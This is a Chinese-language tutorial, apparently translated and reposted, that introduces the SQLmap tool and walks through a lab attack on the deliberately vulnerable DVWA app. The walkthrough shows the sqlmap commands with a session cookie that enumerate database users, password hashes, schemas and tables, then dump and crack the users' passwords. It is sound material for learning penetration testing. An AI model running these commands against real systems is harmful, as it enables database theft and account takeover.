什么是SQLmap? SQLmap是一款用來檢測與利用SQL注入漏洞的免費開源工具，有一個非常棒的特性，即對檢測與利用的自動化處理(數(shù)據(jù)庫指紋、訪問底層文件系統(tǒng)、執(zhí)行命令)。 讀者可以通過位于SourceForge的官方網(wǎng)站下載SQLmap源碼： SQLmap的作者是誰? Bernardo Da

　　什么是SQLmap?

　　SQLmap是一款用來檢測與利用SQL注入漏洞的免費開源工具，有一個非常棒的特性，即對檢測與利用的自動化處理(數(shù)據(jù)庫指紋、訪問底層文件系統(tǒng)、執(zhí)行命令)。

　　讀者可以通過位于SourceForge的官方網(wǎng)站下載SQLmap源碼：

　　SQLmap的作者是誰?

　　Bernardo DameleAssumpcao Guimaraes (@inquisb)，讀者可以通過bernardo@sqlmap.org與他取得聯(lián)系，以及Miroslav Stampar (@stamparm)讀者可以通過miroslav@sqlmap.org與他聯(lián)系。

　　同時讀者也可以通過dev@sqlmap.org與SQLmap的所有開發(fā)者聯(lián)系。

　　執(zhí)行SQLmap的命令是什么?

　　進入sqlmap.py所在的目錄，執(zhí)行以下命令：

　　#python sqlmap.py -h

　　(譯注：選項列表太長了，而且與最新版本有些差異，所以這里不再列出，請讀者下載最新版在自己機器上看吧)

　　SQLmap命令選項被歸類為目標(Target)選項、請求(Request)選項、優(yōu)化、注入、檢測、技巧(Techniques)、指紋、枚舉等。

　　如何使用SQLmap：

　　為方便演示，我們創(chuàng)建兩個虛擬機：

　　1、受害者機器， windows XP操作系統(tǒng)，運行一個web服務(wù)器，同時跑著一個包含漏洞的web應(yīng)用(DVWA)。

　　2、攻擊器機器，使用Ubuntu 12.04，包含SQLmap程序。

　　本次實驗的目的：使用SQLmap得到以下信息：

　　3、枚舉MYSQL用戶名與密碼。

　　4、枚舉所有數(shù)據(jù)庫。

　　5、枚舉指定數(shù)據(jù)庫的數(shù)據(jù)表。

　　6、枚舉指定數(shù)據(jù)表中的所有用戶名與密碼。

　　使用SQLmap之前我們得到需要當前會話cookies等信息，用來在滲透過程中維持連接狀態(tài)，這里使用Firefox中名為“TamperData”的add-on獲取。

　　當前得到的cookie為“security=high;PHPSESSID=57p5g7f32b3ffv8l45qppudqn3″。

　　為方便演示，我們將DVWA安全等級設(shè)置為low：

　　接下來我們進入頁面的“SQL Injection”部分，輸入任意值并提交。可以看到get請求的ID參數(shù)如下：

　　“?id=1&Submit=Submit#”

　　因此該頁面就是我們的目標頁面。

　　以下命令可以用來檢索當前數(shù)據(jù)庫和當前用戶：

　　“./sqlmap.py -u“?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -b –current-db –current-user”

　　使用選項：

　　1、–cookie : 設(shè)置我們的cookie值“將DVWA安全等級從high設(shè)置為low”

　　2、-u : 指定目標URL

　　3、-b : 獲取DBMS banner

　　4、–current-db : 獲取當前數(shù)據(jù)庫

　　5、–current-user:獲取當前用戶

　　結(jié)果如下：

　　可以看到結(jié)果如下：

　　DBMS : MySQLversion 5.0

　　OS versionUbuntu 12.04

　　current user:root

　　current db :DVWA

　　以下命令用來枚舉所有的DBMS用戶和密碼hash，在以后更進一步的攻擊中可以對密碼hash進行破解：

　　“sqlmap.py -u“?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” --string=”Surname” --users --password”

　　使用選項：

　　1、–string : 當查詢可用時用來匹配頁面中的字符串

　　2、–users : 枚舉DBMS用戶

　　3、–password : 枚舉DBMS用戶密碼hash

　　結(jié)果如下：

　　[*] ”@’kingasmk’

　　[*]”@’localhost’

　　[*]‘debian-sys-maint’@'localhost’

　　[*]‘phpmyadmin’@'localhost’

　　[*]‘root’@’127.0.0.1′

　　[*] ‘root’@'::1′

　　[*]‘root’@'kingasmk’

　　[*]‘root’@'localhost’

　　數(shù)據(jù)庫管理系統(tǒng)用戶和密碼hash：

　　password hash:*C30441E06530498BC86019BF3211B94B3BAB295A

　　[*] phpmyadmin[1]:

　　password hash:*C30441E06530498BC86019BF3211B94B3BAB295A

　　[*] root [4]:

　　password hash: *C30441E06530498BC86019BF3211B94B3BAB295A

　　password hash:*C30441E06530498BC86019BF3211B94B3BAB295A

　　password hash:*C30441E06530498BC86019BF3211B94B3BAB295A

　　password hash:*C30441E06530498BC86019BF3211B94B3BAB295A

　　讀者可以使用Cain&Abel、John&Ripper等工具將密碼hash破解為明文。以下命令會枚舉系統(tǒng)中所有的數(shù)據(jù)庫schema：

　　“sqlmap.py -u“?id=1&Submit=Submit”

　　--cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” --dbs”

　　使用選項：

　　–dbs: 枚舉DBMS中的數(shù)據(jù)庫

　　結(jié)果如下：

　　[*]dvwa

　　[*]information_schema

　　[*]mysql

　　[*]performance_schema

　　[*]phpmyadmin

　　下面我們嘗試枚舉DVWA數(shù)據(jù)表，執(zhí)行以下命令：

　　“sqlmap.py-u “?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa --tables”

　　使用選項：

　　1、-D : 要枚舉的DBMS數(shù)據(jù)庫

　　2、–tables : 枚舉DBMS數(shù)據(jù)庫中的數(shù)據(jù)表

　　得到結(jié)果如下：

　　Database: dvwa

　　[2 tables]

　　+————+

　　| guestbook |

　　| users |

　　+————+

　　下面獲取用戶表的列，命令如下：

　　“sqlmap.py -u“?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa -T users --columns”

　　使用選項：

　　-T : 要枚舉的DBMS數(shù)據(jù)庫表

　　–columns : 枚舉DBMS數(shù)據(jù)庫表中的所有列

　　結(jié)果如下：

　　Database: dvwa

　　Table: users

　　[6 columns]

　　+————+————-+

　　| Column | Type|

　　+————+————-+

　　| avatar |varchar(70) |

　　| first_name |varchar(15) |

　　| last_name |varchar(15) |

　　| password |varchar(32) |

　　| user |varchar(15) |

　　| user_id |int(6) |

　　+————+————-+

　　如上所示，以上為我們感興趣的列，表示用戶名與密碼等。下面將每一列的內(nèi)容提取出來。執(zhí)行以下命令，，將用戶與密碼表中的所有用戶名與密碼dump出來：

　　“sqlmap.py -u“?id=1&Submit=Submit”–cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa -T users-C user,password --dump”

　　使用選項：

　　-T : 要枚舉的DBMS數(shù)據(jù)表

　　-C: 要枚舉的DBMS數(shù)據(jù)表中的列

　　–dump : 轉(zhuǎn)儲DBMS數(shù)據(jù)表項

　　SQLmap會提問是否破解密碼，按回車確認：

　　得到所有用戶名與明文密碼如下：

　　Table: users

　　[5 entries]

　　+———+———+———————————————+

　　| user_id | user| password |

　　+———+———+———————————————+

　　| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99(password) |

　　| 2 | gordonb |e99a18c428cb38d5f260853678922e03 (abc123) |

　　| 3 | 1337 |8d3533d75ae2c3966d7e0d4fcc69216b (charley) |

　　| 4 | pablo |0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |

　　| 5 | smithy |5f4dcc3b5aa765d61d8327deb882cf99 (password) |

　　+———+———+———————————————+

　　這時我們就可以利用admin帳戶登錄做任何事了。

　　總結(jié)：

　　SQLmap是一個非常強大的工具，可以用來簡化操作，并自動處理SQL注入檢測與利用。

　　[via infosecinstitute]

注 ：更多精彩教程請關(guān)注三聯(lián)教程頻道

總結(jié)

以上是生活随笔為你收集整理的SQL注入之SQLmap入门([CTFSHOW]SQL注入)的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。